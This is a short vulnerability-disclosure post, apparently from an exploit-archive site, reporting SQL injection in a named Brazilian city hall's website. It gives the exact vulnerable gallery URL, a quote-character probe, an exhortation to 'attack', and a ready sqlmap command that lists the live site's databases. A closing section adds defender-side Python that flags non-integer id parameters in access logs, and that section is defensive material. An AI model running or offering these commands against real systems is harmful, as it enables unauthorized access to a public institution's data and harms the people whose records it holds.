Floriano - PI | SQL Injection

2021.04.11
uromulou (US)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Hello friends, how are you? I'm here to show you a flaw that I found at the Floriano City Hall, in Piaui, Brazil.

Hacker: uRomulou
Website: https://www.floriano.pi.gov.br/
Vulnerability: SQL Injection
Method: GET

Proof of concept:

1. Go to the site with the vulnerability: https://www.floriano.pi.gov.br/galeria.php?id=5%27
2. It will not return errors, as SQL failures do not always return errors.
3. And attack! You can use tools like sqlmap or others. An example using sqlmap:

sqlmap --random-agent --batch --url https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs
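A defender-side check for the behaviour in step 2, added here as an example and not part of the original advisory: because the quote probe returns no error, it flags access-log requests to galeria.php whose id is not a plain integer, regardless of response status. The combined log format, the function name, the IP addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")

# Constructed sample log lines (documentation IP ranges). Every response is
# 200, so filtering on 5xx errors alone would miss the probe.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Apr/2021:10:00:01 +0000] "GET /galeria.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Apr/2021:10:00:05 +0000] "GET /galeria.php?id=5%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [11/Apr/2021:10:00:06 +0000] "GET /galeria.php?id= HTTP/1.1" 200 312',
    '192.0.2.10 - - [11/Apr/2021:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]


def suspicious_id_requests(log_lines, script="/galeria.php", param="id"):
    """Return (client_ip, decoded_value) for each request to `script`
    whose `param` value is not a plain ASCII integer."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        parts = urlsplit(match.group("target"))
        if parts.path != script:
            continue  # only the endpoint that expects a numeric id
        # parse_qs percent-decodes, so %27 is compared as a literal quote
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not INTEGER_RE.fullmatch(value):
                client_ip = line.split(" ", 1)[0]
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer id: {value!r}")
```

The same integer-only rule belongs in the application itself: reject any id that fails it and pass the value to the database through a parameterized query.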



Copyright 2021, cxsecurity.com

 
